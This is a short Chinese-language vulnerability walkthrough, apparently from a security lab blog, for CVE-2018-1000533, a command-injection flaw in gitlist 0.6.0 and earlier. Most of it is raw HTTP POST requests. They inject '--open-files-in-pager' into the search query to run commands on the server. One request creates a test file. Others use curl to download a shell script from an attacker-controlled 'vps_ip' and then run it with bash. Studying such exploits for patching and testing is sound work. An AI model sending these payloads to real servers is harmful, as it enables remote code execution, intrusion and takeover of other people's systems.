【初级】gitlist 0.6.0 远程命令执行漏洞



CVE-2018-1000533

漏洞描述:gitlist是一款使用PHP开发的图形化git仓库查看工具。在其0.6.0版本及以前,存在一处命令参数注入问题,可以导致远程命令执行漏洞。

影响版本:0.6.0版本及以前

参考资料:

POC:

POST /example/tree/a/search HTTP/1.1
Host: your-ip:8080
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Content-Length: 56

query=--open-files-in-pager=touch /tmp/success;

漏洞复现

POST /example/tree/a/search HTTP/1.1
Host: your-ip:8080
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xm							l;q=0.9,image/webp,image/apng,*/*;q=0.8
Content-Length: 56

query=--open-files-in-pager=curl http://vps_ip/shell.txt -o /tmp/shell.sh;
图片[1]-【初级】gitlist 0.6.0 远程命令执行漏洞-NGC660 安全实验室
POST /example/tree/a/search HTTP/1.1
Host: 192.168.75.150:8080
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Content-Length: 52

query=--open-files-in-pager=/bin/bash /tmp/shell.sh;
图片[2]-【初级】gitlist 0.6.0 远程命令执行漏洞-NGC660 安全实验室
图片[3]-【初级】gitlist 0.6.0 远程命令执行漏洞-NGC660 安全实验室
© 版权声明
THE END
喜欢就支持一下吧
点赞14 分享